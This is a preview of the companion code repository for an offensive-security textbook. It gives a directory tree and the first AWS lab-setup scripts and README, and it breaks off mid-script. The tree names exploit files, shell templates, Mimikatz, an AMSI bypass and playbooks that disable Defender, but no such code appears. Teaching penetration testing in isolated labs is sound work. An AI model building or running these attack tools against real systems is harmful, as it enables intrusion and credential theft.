Showing preview only (3,668K chars total). Download the full file or copy to clipboard to get everything.
Repository: GrayHatHacking/GHHv6
Branch: main
Commit: bd396187f804
Files: 500
Total size: 174.8 MB
Directory structure:
gitextract_9jdookxc/
├── .gitignore
├── CloudSetup/
│ ├── README.md
│ ├── build-images.sh
│ ├── delete-old-images.sh
│ ├── delete-orphaned-snaps.sh
│ ├── deprovision.sh
│ ├── eksall.template
│ ├── find-orphaned-snaps.sh
│ ├── install-cloud-tools.sh
│ ├── kali-base/
│ │ ├── config.sh
│ │ └── kali.hcl
│ ├── provision.sh
│ ├── server-2016-base/
│ │ ├── bootstrap.ps1
│ │ ├── server2016_template.json
│ │ └── user_data.ps1
│ └── server-2019-base/
│ ├── bootstrap.ps1
│ ├── server2019_template.json
│ └── user_data.ps1
├── README.md
├── ch02/
│ ├── client.py
│ ├── fmt_str.c
│ ├── hello.asm
│ ├── hello.c
│ ├── ifelse.c
│ ├── meet.c
│ ├── memory.c
│ ├── targets
│ └── while_ex.c
├── ch03/
│ ├── heapme_demo.c
│ ├── hello.c
│ ├── leak-bof-exploit.py
│ └── leak-bof.c
├── ch04/
│ ├── students-patched.c
│ ├── students.c
│ └── students.csv
├── ch05/
│ ├── myAtoi
│ ├── myAtoi.c
│ ├── myProg
│ └── myProg.c
├── ch07/
│ ├── Lab/
│ │ ├── ansible/
│ │ │ ├── ansible.cfg
│ │ │ ├── ch07_playbook.yml
│ │ │ ├── roles/
│ │ │ │ ├── common/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── meta/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── chocolatey-components.yml
│ │ │ │ │ ├── main.yml
│ │ │ │ │ ├── windows-components.yml
│ │ │ │ │ └── windows-disable-defender.yml
│ │ │ │ ├── kali_customizations/
│ │ │ │ │ ├── files/
│ │ │ │ │ │ ├── addshare.txt
│ │ │ │ │ │ ├── covenant.patch
│ │ │ │ │ │ └── shells/
│ │ │ │ │ │ ├── build_csharp.sh
│ │ │ │ │ │ ├── build_go.sh
│ │ │ │ │ │ ├── build_nim.sh
│ │ │ │ │ │ ├── csharp.template
│ │ │ │ │ │ ├── execute.template
│ │ │ │ │ │ ├── go.mod
│ │ │ │ │ │ ├── go.sum
│ │ │ │ │ │ ├── go.template
│ │ │ │ │ │ └── nim.template
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── .main.yml.swp
│ │ │ │ │ └── main.yml
│ │ │ │ ├── target_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_client_join_domain/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_dns_server/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── features.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_controller/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── create.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_users_groups/
│ │ │ │ │ ├── files/
│ │ │ │ │ │ └── usermods.ps1
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ └── windows_local_group_membership/
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── vars/
│ │ │ ├── users.yml
│ │ │ └── vars.yml
│ │ ├── build.sh
│ │ ├── destroy.sh
│ │ └── terraform/
│ │ ├── aws_data.tf
│ │ ├── aws_hosts.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── outputs.tf
│ │ ├── terraform.tfvars-orig
│ │ ├── variables.tf
│ │ ├── versions.tf
│ │ └── vpc.tf
│ └── README.md
├── ch08/
│ └── winlogbeat.yml
├── ch10/
│ ├── ch10_6
│ ├── ch10_6_exploit.py
│ ├── getenv.c
│ ├── meet.c
│ ├── meet_exploit.py
│ ├── overflow.c
│ ├── shellcode.c
│ ├── smallbuff.c
│ └── smallbuff_exploit.py
├── ch11/
│ ├── README.md
│ ├── exploit1.py
│ ├── exploit2.py
│ ├── exploit3-v2.py
│ ├── exploit3.py
│ ├── exploit4.py
│ ├── vuln
│ └── vuln.c
├── ch12/
│ ├── bzImage
│ ├── initramfs.cpio
│ ├── run1.sh
│ ├── run2.sh
│ ├── run3.sh
│ ├── run4.sh
│ ├── run5.sh
│ ├── shared/
│ │ ├── .ash_history
│ │ ├── exploit1/
│ │ │ └── exploit.c
│ │ ├── exploit2/
│ │ │ └── exploit.c
│ │ ├── exploit3/
│ │ │ └── exploit.c
│ │ ├── exploit4/
│ │ │ └── exploit.c
│ │ ├── exploit5/
│ │ │ └── exploit.c
│ │ └── leak.c
│ ├── stackprotector-disabled/
│ │ ├── bzImage
│ │ └── vmlinux
│ └── vmlinux
├── ch13/
│ ├── hello.c
│ ├── meet.c
│ ├── prosshd1.py
│ ├── prosshd2.py
│ ├── prosshd3.py
│ └── prosshd_dep.py
├── ch14/
│ ├── binaries/
│ │ └── DBUtil_2_3.Sys
│ ├── dbutil_exploit/
│ │ ├── Cargo.toml
│ │ └── src/
│ │ ├── bin/
│ │ │ ├── exploit.rs
│ │ │ └── ioctlcall.rs
│ │ └── lib.rs
│ ├── dbutil_exploit.c
│ ├── dbutil_exploit.py
│ └── ioctlcall.py
├── ch15/
│ ├── Lab/
│ │ ├── ansible/
│ │ │ ├── ansible.cfg
│ │ │ ├── ch15_playbook.yml
│ │ │ ├── roles/
│ │ │ │ ├── common/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── meta/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── chocolatey-components.yml
│ │ │ │ │ ├── main.yml
│ │ │ │ │ ├── windows-components.yml
│ │ │ │ │ └── windows-disable-defender.yml
│ │ │ │ ├── kali_customizations/
│ │ │ │ │ ├── files/
│ │ │ │ │ │ ├── Invoke-Mimikatz.ps1
│ │ │ │ │ │ └── amsi.ps1
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ └── target_customizations/
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── vars/
│ │ │ ├── users.yml
│ │ │ └── vars.yml
│ │ ├── build.sh
│ │ ├── destroy.sh
│ │ ├── get-ips.sh
│ │ └── terraform/
│ │ ├── aws_data.tf
│ │ ├── aws_hosts.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── outputs.tf
│ │ ├── terraform.tfvars-orig
│ │ ├── variables.tf
│ │ ├── versions.tf
│ │ └── vpc.tf
│ └── README.md
├── ch16/
│ ├── Lab/
│ │ ├── ansible/
│ │ │ ├── ansible.cfg
│ │ │ ├── ch16_playbook.yml
│ │ │ ├── roles/
│ │ │ │ ├── common/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── meta/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── chocolatey-components.yml
│ │ │ │ │ ├── main.yml
│ │ │ │ │ ├── windows-components.yml
│ │ │ │ │ └── windows-disable-defender.yml
│ │ │ │ ├── kali_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── target_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── util_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_client_join_domain/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_dns_server/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── features.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_controller/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── create.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_users_groups/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ └── windows_local_group_membership/
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── vars/
│ │ │ ├── users.yml
│ │ │ └── vars.yml
│ │ ├── build.sh
│ │ ├── destroy.sh
│ │ ├── terminate-util.sh
│ │ └── terraform/
│ │ ├── aws_data.tf
│ │ ├── aws_hosts.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── outputs.tf
│ │ ├── terraform.tfvars-orig
│ │ ├── variables.tf
│ │ ├── versions.tf
│ │ └── vpc.tf
│ ├── README.md
│ └── passwords.txt
├── ch17/
│ ├── Lab/
│ │ ├── ansible/
│ │ │ ├── ansible.cfg
│ │ │ ├── ch17_playbook.yml
│ │ │ ├── roles/
│ │ │ │ ├── common/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── meta/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── chocolatey-components.yml
│ │ │ │ │ ├── main.yml
│ │ │ │ │ ├── windows-components.yml
│ │ │ │ │ └── windows-disable-defender.yml
│ │ │ │ ├── kali_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── .main.yml.swp
│ │ │ │ │ └── main.yml
│ │ │ │ ├── target_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── .main.yml.swp
│ │ │ │ │ └── main.yml
│ │ │ │ ├── util_customizations/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_client_join_domain/
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── windows_dns_server/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── features.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_controller/
│ │ │ │ │ ├── defaults/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ ├── create.yml
│ │ │ │ │ ├── main.yaml
│ │ │ │ │ └── reboot.yml
│ │ │ │ ├── windows_domain_users_groups/
│ │ │ │ │ ├── files/
│ │ │ │ │ │ └── usermods.ps1
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ └── windows_local_group_membership/
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── vars/
│ │ │ ├── users.yml
│ │ │ └── vars.yml
│ │ ├── build.sh
│ │ ├── destroy.sh
│ │ ├── terminate-util.sh
│ │ └── terraform/
│ │ ├── aws_data.tf
│ │ ├── aws_hosts.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── outputs.tf
│ │ ├── terraform.tfvars-orig
│ │ ├── variables.tf
│ │ ├── versions.tf
│ │ └── vpc.tf
│ ├── README.md
│ └── Run-SDProp.ps1
├── ch18/
│ ├── name
│ ├── name2
│ └── test
├── ch19/
│ ├── lab-19-1/
│ │ └── README.txt
│ ├── lab-19-2/
│ │ ├── README.txt
│ │ ├── facet-search.py
│ │ ├── install.sh
│ │ └── mqtt-search.py
│ └── lab-19-3/
│ ├── README.txt
│ └── mqtt-scan.py
├── ch21/
│ ├── lab-21-1/
│ │ ├── README.txt
│ │ └── lab-21-1.sh
│ ├── lab-21-2/
│ │ ├── lab-21-2.sh
│ │ └── ssi
│ ├── lab-21-3/
│ │ └── README.txt
│ ├── lab-21-4/
│ │ └── README.txt
│ └── lab-21-5/
│ └── README.txt
├── ch22/
│ ├── Analyze/
│ │ ├── README.txt
│ │ ├── cmds.txt
│ │ ├── decode-inspectrum.py
│ │ └── install.sh
│ ├── Capture/
│ │ ├── README.txt
│ │ ├── remote1-1off-4m-316mhz
│ │ ├── remote1-1on-4m-316mhz
│ │ ├── remote1-2off-4m-316mhz
│ │ ├── remote1-2on-4m-316mhz
│ │ ├── remote1-3off-4m-316mhz
│ │ ├── remote1-3on-4m-316mhz
│ │ ├── remote2-1off-4m-316mhz
│ │ ├── remote2-1on-4m-316mhz
│ │ ├── remote2-2off-4m-316mhz
│ │ ├── remote2-2on-4m-316mhz
│ │ ├── remote2-3off-4m-316mhz
│ │ ├── remote2-3on-4m-316mhz
│ │ └── remote_analysis.grc
│ ├── Execute/
│ │ ├── README.txt
│ │ └── test-execute.grc
│ ├── Preview/
│ │ ├── README.txt
│ │ └── test-preview.grc
│ └── Replay/
│ ├── README.txt
│ └── remote_analysis_replay.grc
├── ch24/
│ ├── Dockerfile
│ ├── README.md
│ └── labs/
│ ├── lab1/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ └── main.c
│ ├── lab2/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ ├── main.c
│ │ ├── protocol.c
│ │ └── protocol.h
│ ├── lab3/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── guest.py
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ ├── main.c
│ │ ├── main.py
│ │ ├── multiboot2.h
│ │ ├── protocol.c
│ │ ├── protocol.h
│ │ └── protocol.py
│ ├── lab4/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── code.py
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── guest.py
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ ├── macros.asm
│ │ ├── main.c
│ │ ├── main.py
│ │ ├── multiboot2.h
│ │ ├── protocol.c
│ │ ├── protocol.h
│ │ ├── protocol.py
│ │ └── remotemem.py
│ ├── lab5/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── code.py
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── fuzzer.py
│ │ ├── guest.py
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ ├── macros.asm
│ │ ├── main.c
│ │ ├── multiboot2.h
│ │ ├── port_fuzzer.py
│ │ ├── protocol.c
│ │ ├── protocol.h
│ │ ├── protocol.py
│ │ └── remotemem.py
│ ├── lab6/
│ │ ├── Makefile
│ │ ├── bootstrap.asm
│ │ ├── code.py
│ │ ├── common.c
│ │ ├── common.h
│ │ ├── fuzzer.py
│ │ ├── guest.py
│ │ ├── iso/
│ │ │ └── boot/
│ │ │ └── grub/
│ │ │ └── grub.cfg
│ │ ├── macros.asm
│ │ ├── main.c
│ │ ├── msr_fuzzer.py
│ │ ├── multiboot2.h
│ │ ├── protocol.c
│ │ ├── protocol.h
│ │ ├── protocol.py
│ │ └── remotemem.py
│ └── lab7/
│ ├── Makefile
│ ├── bootstrap.asm
│ ├── code.py
│ ├── common.c
│ ├── common.h
│ ├── fuzzer.py
│ ├── guest.py
│ ├── iso/
│ │ └── boot/
│ │ └── grub/
│ │ └── grub.cfg
│ ├── macros.asm
│ ├── main.c
│ ├── msr_fuzzer.py
│ ├── multiboot2.h
│ ├── protocol.c
│ ├── protocol.h
│ ├── protocol.py
│ └── remotemem.py
├── ch25/
│ ├── Dockerfile
│ └── labs/
│ ├── Makefile
│ ├── bootstrap.asm
│ ├── code.py
│ ├── common.c
│ ├── common.h
│ ├── guest.py
│ ├── hypercall.py
│ ├── hyperv_guest.py
│ ├── iso/
│ │ └── boot/
│ │ └── grub/
│ │ └── grub.cfg
│ ├── macros.asm
│ ├── main.c
│ ├── multiboot2.h
│ ├── pci.py
│ ├── protocol.c
│ ├── protocol.h
│ ├── protocol.py
│ ├── remotemem.py
│ ├── session.py
│ ├── time_sync.py
│ └── vmbus.py
├── ch26/
│ ├── Dockerfile
│ └── labs/
│ ├── Makefile
│ ├── bootstrap.asm
│ ├── code.py
│ ├── common.c
│ ├── common.h
│ ├── cstruct.py
│ ├── ehci.py
│ ├── guest.py
│ ├── iso/
│ │ └── boot/
│ │ └── grub/
│ │ └── grub.cfg
│ ├── macros.asm
│ ├── main.c
│ ├── multiboot2.h
│ ├── pci.py
│ ├── protocol.c
│ ├── protocol.h
│ ├── protocol.py
│ ├── qemu_guest.py
│ ├── qemu_xpl.py
│ ├── remotemem.py
│ ├── session.py
│ └── trigger.py
├── ch27/
│ ├── README.md
│ └── lab/
│ ├── ansible/
│ │ ├── ansible.cfg
│ │ ├── ch27_playbook.yml
│ │ ├── roles/
│ │ │ ├── common/
│ │ │ │ └── default/
│ │ │ │ └── main.yml
│ │ │ ├── kali_customizations/
│ │ │ │ ├── files/
│ │ │ │ │ └── getEC2WinCreds.py
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── victim1/
│ │ │ └── tasks/
│ │ │ └── main.yml
│ │ └── vars/
│ │ ├── users.yml
│ │ └── vars.yml
│ ├── apps/
│ │ └── webapp/
│ │ └── index.js
│ ├── build.sh
│ ├── destroy.sh
│ ├── terraform/
│ │ ├── data.tf
│ │ ├── documents/
│ │ │ └── perform_healthcheck.yml
│ │ ├── ec2.tf
│ │ ├── iam.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── output.tf
│ │ ├── s3.tf
│ │ ├── variables.tf
│ │ └── vpc.tf
│ └── terraform2/
│ ├── build2.sh
│ ├── data.tf
│ ├── destroy2.sh
│ ├── ec2.tf
│ ├── inventory.tmpl
│ ├── main.tf
│ ├── output.tf
│ ├── variables.tf
│ └── vpc.tf
├── ch28/
│ ├── Metasploit.md
│ └── get_managed_id.ps1
├── ch29/
│ ├── Lab/
│ │ ├── ansible/
│ │ │ ├── ansible.cfg
│ │ │ ├── ch29_playbook.yml
│ │ │ ├── roles/
│ │ │ │ ├── common/
│ │ │ │ │ └── defaults/
│ │ │ │ │ └── main.yml
│ │ │ │ ├── docker/
│ │ │ │ │ ├── files/
│ │ │ │ │ │ ├── daemon.json
│ │ │ │ │ │ └── override.conf
│ │ │ │ │ ├── handlers/
│ │ │ │ │ │ └── main.yml
│ │ │ │ │ └── tasks/
│ │ │ │ │ └── main.yml
│ │ │ │ └── kali_customizations/
│ │ │ │ └── tasks/
│ │ │ │ └── main.yml
│ │ │ └── vars/
│ │ │ ├── users.yml
│ │ │ └── vars.yml
│ │ ├── build.sh
│ │ ├── destroy.sh
│ │ ├── easy/
│ │ │ └── Dockerfile
│ │ ├── nmap/
│ │ │ ├── Dockerfile
│ │ │ └── output/
│ │ │ └── test
│ │ ├── targets/
│ │ │ ├── docker-compose.yml
│ │ │ └── web/
│ │ │ ├── .dockerignore
│ │ │ ├── .gitignore
│ │ │ ├── Dockerfile
│ │ │ ├── app.py
│ │ │ ├── requirements.txt
│ │ │ └── templates/
│ │ │ ├── base.html
│ │ │ └── index.html
│ │ └── terraform/
│ │ ├── aws_data.tf
│ │ ├── aws_hosts.tf
│ │ ├── inventory.tmpl
│ │ ├── main.tf
│ │ ├── output.tf
│ │ ├── variables.tf
│ │ └── vpc.tf
│ └── README.md
└── ch30/
├── Lab/
│ ├── .gitignore
│ ├── badperms.yml
│ ├── build.sh
│ ├── container.yml
│ ├── destroy.sh
│ ├── eksctl.yml
│ ├── ncat-svc.yml
│ └── ncat.yml
└── README.md
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
*.tfstate*
**/.terraform.lock.hcl
*.tvars
**/.terraform
*.DS_Store
**/*.DS_Store
================================================
FILE: CloudSetup/README.md
================================================
The following instructions are for all AWS labs in this book. There are separate instructions for Azure, inside Chapter 8, of the book.
###### Cloud Setup Instructions
1. Signup for an AWS account
Go to https://aws.amazon.com and signup for a new account
2. These have been designed to run under a *nix installation. This can be done with a downloaded Kali (https://www.kali.org/downloads/)
installation, your favorite *nix implementation of choice, or Windows Subsystem for Linux
(https://docs.microsoft.com/en-us/windows/wsl/install-win10).
Alternatively, if you want to do this all in the cloud, once you've signed into your account go to Amazon CloudShell. If you do this, make sure it has its own tab, you will need to copy/paste information from other pages in the Amazon AWS console.
3. Install the following items:
AWS Cli (https://docs.aws.amazon.com/cli/latest/userguide/install-cliv2-linux.html)
Packer (https://learn.hashicorp.com/tutorials/packer/getting-started-install)
Terraform (https://learn.hashicorp.com/tutorials/terraform/install-cli
Ansible (https://docs.ansible.com/ansible/latest/installation_guide/intro_installation.html)
jq (apt-get install jq or https://stedolan.github.io/jq/)
If you are using Amazon CloudShell, run these commands
```
git clone https://github.com/GrayHatHacking/GHHv6.git
cd GHHv6/CloudSetup
bash install-cloud-tools.sh
. ~/.bash_profile
```
If you are using Kali Linux, run these commands
```
git clone https://github.com/GrayHatHacking/GHHv6.git
sudo apt-get update
sudo apt-get install awscli packer software-properties-common ansible jq
curl -fsSL https://apt.releases.hashicorp.com/gpg | sudo apt-key add -
sudo apt-add-repository "deb [arch=amd64] https://apt.releases.hashicorp.com buster main"
sudo apt-get update && sudo apt-get install terraform
```
4. In the AWS console, go to "My Security Credentials"<BR>
 <BR>
Go to access keys and Click "New Access Key"<BR>
 <BR>
Download the key file <BR>
 <BR>
5. Open the file in an editor, then open a console window and type in:
`aws configure` <BR>
 <BR>
Add the access key and the secret key from the file to the configuration and choose `us-east-1` for the region.<BR>
this region has all the AWS features we will need, so it is a safe default. For default output format, choose `json`.
6. If you have not already done so, execute a git clone of this repository:
`git clone https://github.com/GrayHatHacking/GHHv6.git`
Change directory into the CloudSetup directory and then run the `provision.sh` file. This will create all of the necessary roles and permissions that will be needed for the
exercises in the book. It will create a new user called `ghh` and a new profile called `ghh` so that all of the examples
will work without modification.
7. SSH keys will be needed for these exercises. If you have not created one then run `ssh-keygen` to
generate a new key pair. The result should be a file in `~/.ssh/` called `id_rsa` and one called `id_rsa.pub`.
These files will be used to generate a key for use in AWS to SSH from and will make the rest of the examples easier.
8. Create the keypair in AWS:<BR>
`aws ec2 import-key-pair --key-name ghh --public-key-material fileb://~/.ssh/id_rsa.pub --profile=ghh --region=us-east-1`
9. Run `build-images.sh` to build the base images for the rest of the exercises. This will take a few minutes to an hour.
================================================
FILE: CloudSetup/build-images.sh
================================================
#!/bin/bash
PACKER=/usr/bin/packer
if [ -f ~/.local/bin/packer ] ; then
PACKER=~/.local/bin/packer
fi
cd kali-base
$PACKER build kali.hcl
cd ../server-2016-base
$PACKER build server2016_template.json
cd ../server-2019-base
$PACKER build server2019_template.json
cd ..
================================================
FILE: CloudSetup/delete-old-images.sh
================================================
#!/bin/bash
RED='\033[0;31m'
WHITE='\033[0;37m'
GREEN='\033[0;32m'
NC='\033[0m' # No Color
imagelist=(ghh-server2016 ghh-server2019 ghh-kali)
for i in ${imagelist[@]}; do
latest=`aws ec2 describe-images --owner=self --filter "Name=name,Values=$i-*" --query "Images[*].[Name,ImageId,CreationDate ]" --output text --profile=ghh --region=us-east-1| sort -k3 -r | head -1| cut -f 2`
all=`aws ec2 describe-images --owner=self --filter "Name=name,Values=$i-*" --query "Images[*].[ImageId]" --output text --profile=ghh --region=us-east-1`
printf "${WHITE}[=] Searching for $i, found latest $latest{$NC}\n"
for img in $all; do
if [ $img == $latest ]; then
printf "${GREEN}[*] Skipping delete of latest image $img${NC}\n"
else
printf "${RED}[-] Dereistering old image $img${NC}\n"
aws ec2 deregister-image --image $img --profile=ghh --region=us-east-1
fi
done
printf "${NC}\n"
done
================================================
FILE: CloudSetup/delete-orphaned-snaps.sh
================================================
#!/bin/bash
RED='\033[0;31m'
WHITE='\033[0;37m'
GREEN='\033[0;32m'
NC='\033[0m' # No Color
printf "${WHITE}[*] Retrieving image list${NC}\n"
snaplist=`aws ec2 describe-images --owner self --query "Images[*].[BlockDeviceMappings[0].Ebs.SnapshotId]" --output text --region=us-east-1 --profile=ghh`
printf "${WHITE}[*] Retrieving snapshot list${NC}\n"
allsnaps=`aws ec2 describe-snapshots --owner self --profile=ghh --region=us-east-1 --query "Snapshots[*].SnapshotId" --output text`
for snap in $allsnaps; do
found=0
for l in $snaplist; do
if [ "$snap" == "$l" ]; then
found=1
fi
done
if [ $found -eq 1 ] ; then
printf "${GREEN}[+] Snap $snap is active${NC}\n"
else
printf "${RED}[-] Snap $snap is not active..Deleting${NC}\n"
aws ec2 delete-snapshot --snapshot-id $snap --profile=ghh --region=us-east-1
fi
done;
================================================
FILE: CloudSetup/deprovision.sh
================================================
#!/bin/bash
AWS=`which aws`
JQ=`which jq`
if ! test -f "$AWS"; then
echo "AWS cli is required for execution, please install and try again"
exit
fi
if ! test -f "$JQ"; then
echo "JQ is required for execution, please install and try again"
exit
fi
if ! test -f "key-out.json"; then
echo "Cannot deproision without the key-out.json file"
exit
fi
aws iam remove-user-from-group --user-name ghh --group-name ghh-group
aws iam detach-group-policy --group-name ghh-group --policy-arn arn:aws:iam::aws:policy/AmazonEC2FullAccess
aws iam detach-group-policy --group-name ghh-group --policy-arn arn:aws:iam::aws:policy/AmazonS3FullAccess
aws iam detach-group-policy --group-name ghh-group --policy-arn arn:aws:iam::aws:policy/IAMFullAccess
aws iam detach-group-policy --group-name ghh-group --policy-arn arn:aws:iam::aws:policy/AmazonSSMFullAccess
aws iam detach-group-policy --group-name ghh-group --policy-arn arn:aws:iam::aws:policy/AmazonRoute53FullAccess
aws iam delete-group --group-name ghh-group
aws iam delete-access-key --user-name ghh --access-key-id `jq .AccessKey.AccessKeyId key-out.json | cut -f 2 -d '"'`
aws iam delete-user --user-name ghh
================================================
FILE: CloudSetup/eksall.template
================================================
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "eks:*",
"Resource": "*"
},
{
"Action": [
"ssm:GetParameter",
"ssm:GetParameters"
],
"Resource": [
"arn:aws:ssm:*:ACCTNO:parameter/aws/*",
"arn:aws:ssm:*::parameter/aws/*"
],
"Effect": "Allow"
},
{
"Action": [
"kms:CreateGrant",
"kms:DescribeKey"
],
"Resource": "*",
"Effect": "Allow"
}
]
}
================================================
FILE: CloudSetup/find-orphaned-snaps.sh
================================================
#!/bin/bash
RED='\033[0;31m'
WHITE='\033[0;37m'
GREEN='\033[0;32m'
NC='\033[0m' # No Color
printf "${WHITE}[*] Retrieving image list${NC}\n"
snaplist=`aws ec2 describe-images --owner self --query "Images[*].[BlockDeviceMappings[0].Ebs.SnapshotId]" --output text --region=us-east-1 --profile=ghh`
printf "${WHITE}[*] Retrieving snapshot list${NC}\n"
allsnaps=`aws ec2 describe-snapshots --owner self --profile=ghh --region=us-east-1 --query "Snapshots[*].SnapshotId" --output text`
for snap in $allsnaps; do
found=0
for l in $snaplist; do
if [ "$snap" == "$l" ]; then
found=1
fi
done
if [ $found -eq 1 ] ; then
printf "${GREEN}[+] Snap $snap is active${NC}\n"
else
printf "${RED}[-] Snap $snap is not active..${NC}\n"
fi
done;
================================================
FILE: CloudSetup/install-cloud-tools.sh
================================================
#!/bin/bash
#Kali VMWare Image doesn't have pip3
echo "[+] Installing Python3 pip"
sudo apt install python3-pip -y
echo "[+] Installing Ansible and pywinrm"
pip3 install --user ansible pywinrm
echo "[+] Installing Terraform 0.14.5"
wget https://releases.hashicorp.com/terraform/0.14.5/terraform_0.14.5_linux_amd64.zip
echo "[+] Installing Packer"
wget https://releases.hashicorp.com/packer/1.6.6/packer_1.6.6_linux_amd64.zip
unzip terraform*.zip -d ~/.local/bin/
unzip packer*.zip -d ~/.local/bin/
rm terraform*.zip
rm packer*.zip
echo -e "PATH=\$HOME/.local/bin:\$PATH\nexport PATH\n" >> .bash_profile
echo -e "Cloud tools installed.. to add them to your path type in:\n . .bash_profile\n"
================================================
FILE: CloudSetup/kali-base/config.sh
================================================
#!/bin/bash
export DEBIAN_FRONTEND=noninteractive
ERRORS=0
apt-get update && apt-get -y upgrade
apt-get -y dist-upgrade
echo "# Installing software properties common"
apt-get install -y software-properties-common gnupg
echo "# Attempting to install kali keys"
wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add -
gpg --keyserver pgpkeys.mit.edu --recv-key ED444FF07D8D0BF6
gpg -a --export ED444FF07D8D0BF6 | apt-key add -
echo deb http://http.kali.org/kali kali-rolling main non-free contrib > /etc/apt/sources.list.d/kali.list
echo 'Acquire::Retries "3";' > /etc/apt/apt.conf.d/80-retries
apt-get update
echo "#Trying to install Kali components"
apt-get install -y kali-linux-headless || ERRORS=1
if [ $ERRORS -ne 0 ] ;then
